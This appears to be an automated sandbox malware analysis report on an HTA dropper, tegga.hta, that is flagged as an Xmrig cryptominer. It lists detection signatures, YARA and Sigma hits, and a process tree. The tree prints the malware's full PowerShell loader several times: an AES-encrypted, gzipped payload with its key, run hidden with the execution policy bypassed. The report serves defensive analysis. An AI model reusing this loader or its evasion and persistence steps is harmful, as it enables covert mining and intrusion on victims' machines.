Windows
Analysis Report
tegga.hta
Overview
General Information
Detection
Xmrig
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell creates an autostart link
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious command line found
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 4664 cmdline: mshta.exe "C:\Users\user\Desktop\tegga.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 5748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $glegle = 'FvLGrTA8BFp3jKef1kr1AMIDvxnQsqG2K75pfL4ZV6IacsNtEdiPrVXMoDXJJ1l7L0uEFRZXjT2SnU+Hpa12OXdL6HmSMV3lCNEmmRTljkJ7FDCJ7bbjjKCKO7B+MFRj3l35ntTU3i2mvX2tJo2m3WQNztocNZdvzcDsu+VeybsXnUIYkKqovpq+nAFeBElczXo2aBTR9gxe75nw0zF4qSSZOXYCfie4IX8vFhXfHYhEARxZ7Nn0WbMm0eDZW91aqeEVLr0cEUUdv53w8tfniJc2fp/3hOuhRm6ukXc5Dx3yIqAl9YQ1YNGpwJ4UlbAnKOAtZ+sFqu2cAMbPVqb7nfDopeg4WknaYnUnLeVI8O/E7crxweOx6O4AhTJ6qURxSwM9HkjHDuG6TccjkVM2jDbEeVSe5sMZCdA114KDr/xd3WQhLUs685bmTHADpqBoZribHtQN1tcL6KRmUw5Ro46utb7IfJMDIG49jt7UijbRqEZrIe4MC/RquMKXbocoW9dgQEnQ1WYSfBxT217HritL6JD3Ef+3DaGBaOt28L9l6nd1E10oVASZM1R6n1CC';$clscls = 'GkXyEyDz390SNhTkxqmG5l59RAmA3sLhrmajpCLVFE0=';$lmblmb = New-Object 'System.Security.Cryptography.AesManaged';$lmblmb.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lmblmb.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lmblmb.BlockSize = 128;$lmblmb.KeySize = 256;$lmblmb.Key = [System.Convert]::FromBase64String($clscls);$bgbgbg = [System.Convert]::FromBase64String($glegle);$flflfl = $bgbgbg[0..15];$lmblmb.IV = $flflfl;$sasabr = $lmblmb.CreateDecryptor();$frfrfr = $sasabr.TransformFinalBlock($bgbgbg, 16, $bgbgbg.Length - 16);$lmblmb.Dispose();$fisfis = New-Object System.IO.MemoryStream( , $frfrfr );$regist = New-Object System.IO.MemoryStream;$iopole = New-Object System.IO.Compression.GzipStream $fisfis, ([IO.Compression.CompressionMode]::Decompress);$iopole.CopyTo( $regist );$iopole.Close();$fisfis.Close();[byte[]] $frenxk = $regist.ToArray();$baksmo = [System.Text.Encoding]::UTF8.GetString($frenxk);$baksmo | powershell - } MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7196 cmdline: "C:\Windows\system32\cmd.exe" /c powershell.exe $glegle = 'FvLGrTA8BFp3jKef1kr1AMIDvxnQsqG2K75pfL4ZV6IacsNtEdiPrVXMoDXJJ1l7L0uEFRZXjT2SnU+Hpa12OXdL6HmSMV3lCNEmmRTljkJ7FDCJ7bbjjKCKO7B+MFRj3l35ntTU3i2mvX2tJo2m3WQNztocNZdvzcDsu+VeybsXnUIYkKqovpq+nAFeBElczXo2aBTR9gxe75nw0zF4qSSZOXYCfie4IX8vFhXfHYhEARxZ7Nn0WbMm0eDZW91aqeEVLr0cEUUdv53w8tfniJc2fp/3hOuhRm6ukXc5Dx3yIqAl9YQ1YNGpwJ4UlbAnKOAtZ+sFqu2cAMbPVqb7nfDopeg4WknaYnUnLeVI8O/E7crxweOx6O4AhTJ6qURxSwM9HkjHDuG6TccjkVM2jDbEeVSe5sMZCdA114KDr/xd3WQhLUs685bmTHADpqBoZribHtQN1tcL6KRmUw5Ro46utb7IfJMDIG49jt7UijbRqEZrIe4MC/RquMKXbocoW9dgQEnQ1WYSfBxT217HritL6JD3Ef+3DaGBaOt28L9l6nd1E10oVASZM1R6n1CC';$clscls = 'GkXyEyDz390SNhTkxqmG5l59RAmA3sLhrmajpCLVFE0=';$lmblmb = New-Object 'System.Security.Cryptography.AesManaged';$lmblmb.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lmblmb.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lmblmb.BlockSize = 128;$lmblmb.KeySize = 256;$lmblmb.Key = [System.Convert]::FromBase64String($clscls);$bgbgbg = [System.Convert]::FromBase64String($glegle);$flflfl = $bgbgbg[0..15];$lmblmb.IV = $flflfl;$sasabr = $lmblmb.CreateDecryptor();$frfrfr = $sasabr.TransformFinalBlock($bgbgbg, 16, $bgbgbg.Length - 16);$lmblmb.Dispose();$fisfis = New-Object System.IO.MemoryStream( , $frfrfr );$regist = New-Object System.IO.MemoryStream;$iopole = New-Object System.IO.Compression.GzipStream $fisfis, ([IO.Compression.CompressionMode]::Decompress);$iopole.CopyTo( $regist );$iopole.Close();$fisfis.Close();[byte[]] $frenxk = $regist.ToArray();$baksmo = [System.Text.Encoding]::UTF8.GetString($frenxk);$baksmo | powershell - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7240 cmdline: powershell.exe $glegle = 'FvLGrTA8BFp3jKef1kr1AMIDvxnQsqG2K75pfL4ZV6IacsNtEdiPrVXMoDXJJ1l7L0uEFRZXjT2SnU+Hpa12OXdL6HmSMV3lCNEmmRTljkJ7FDCJ7bbjjKCKO7B+MFRj3l35ntTU3i2mvX2tJo2m3WQNztocNZdvzcDsu+VeybsXnUIYkKqovpq+nAFeBElczXo2aBTR9gxe75nw0zF4qSSZOXYCfie4IX8vFhXfHYhEARxZ7Nn0WbMm0eDZW91aqeEVLr0cEUUdv53w8tfniJc2fp/3hOuhRm6ukXc5Dx3yIqAl9YQ1YNGpwJ4UlbAnKOAtZ+sFqu2cAMbPVqb7nfDopeg4WknaYnUnLeVI8O/E7crxweOx6O4AhTJ6qURxSwM9HkjHDuG6TccjkVM2jDbEeVSe5sMZCdA114KDr/xd3WQhLUs685bmTHADpqBoZribHtQN1tcL6KRmUw5Ro46utb7IfJMDIG49jt7UijbRqEZrIe4MC/RquMKXbocoW9dgQEnQ1WYSfBxT217HritL6JD3Ef+3DaGBaOt28L9l6nd1E10oVASZM1R6n1CC';$clscls = 'GkXyEyDz390SNhTkxqmG5l59RAmA3sLhrmajpCLVFE0=';$lmblmb = New-Object 'System.Security.Cryptography.AesManaged';$lmblmb.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lmblmb.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lmblmb.BlockSize = 128;$lmblmb.KeySize = 256;$lmblmb.Key = [System.Convert]::FromBase64String($clscls);$bgbgbg = [System.Convert]::FromBase64String($glegle);$flflfl = $bgbgbg[0..15];$lmblmb.IV = $flflfl;$sasabr = $lmblmb.CreateDecryptor();$frfrfr = $sasabr.TransformFinalBlock($bgbgbg, 16, $bgbgbg.Length - 16);$lmblmb.Dispose();$fisfis = New-Object System.IO.MemoryStream( , $frfrfr );$regist = New-Object System.IO.MemoryStream;$iopole = New-Object System.IO.Compression.GzipStream $fisfis, ([IO.Compression.CompressionMode]::Decompress);$iopole.CopyTo( $regist );$iopole.Close();$fisfis.Close();[byte[]] $frenxk = $regist.ToArray();$baksmo = [System.Text.Encoding]::UTF8.GetString($frenxk);$baksmo MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 7248 cmdline: powershell - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 7484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -File C:\Users\user~1\AppData\Local\Temp\runCi.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- chrome.exe (PID: 7628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.blockchain.com/explorer/addresses/btc/16eFuis7C1uU1vUrVK58FLgwXWP1xb4mJo MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- chrome.exe (PID: 7840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1908,i,1200352314455220389,6670408228213856927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- powershell.exe (PID: 2044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -WindowStyle hidden & $env:TEMP\UpdateSSH.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |